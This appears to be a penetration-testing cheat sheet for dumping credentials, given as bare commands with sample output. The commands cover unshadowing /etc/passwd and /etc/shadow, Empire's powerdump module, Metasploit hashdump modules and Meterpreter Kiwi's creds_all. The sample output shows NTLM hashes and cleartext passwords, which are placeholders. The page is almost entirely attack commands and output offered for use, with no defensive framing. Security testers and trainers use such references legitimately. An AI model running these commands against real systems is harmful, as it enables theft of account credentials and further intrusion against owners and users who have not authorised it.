Get Hashes
Hash-identifier
> hashid 123XYZ...
> hash-identifierunshadow (john)
unshadow /etc/passwd /etc/shadow combined.txtEmpire on Windows
(Empire: powershell/credentials/powerdump) > run
[*] Tasked DHX9MABL to run TASK_CMD_JOB
[*] Agent DHX9MABL tasked with task ID 1
[*] Tasked agent agentHIGH to run module powershell/credentials/powerdump
(Empire: powershell/credentials/powerdump) > [*] Agent DHX9MABL returned results.
Administrator:500:blahblahlongstring123xyzabclongstring123abcxyz123abcxyzaa:::
mike:1202:blahblahlongstring123xyzabclongstring123abcxyz123abcxyzaa:::Metasploit - hashdump
smart_hashdump ..sometimes isnt so smart
hashdump ..try both!!!!!
meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/hashdumpMeterpreter Kiwi
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator TARGET abxlkaselkbjlcije89893289823sers lkjawleijviw989w8evw98va9898wer9w8e42893
KALI$ TARGET kleilvkejlaijlsijej3902930923409 0902349824lkajslkjvliaejlwejoifjwf092039
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TARGET secretPW
KALI$ TARGET youFOUNDmypaxxwurd
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TARGET (null)
KALI$ target.local youFOUNDmypaxxwurd
kali $ target.LOCAL (null)Last updated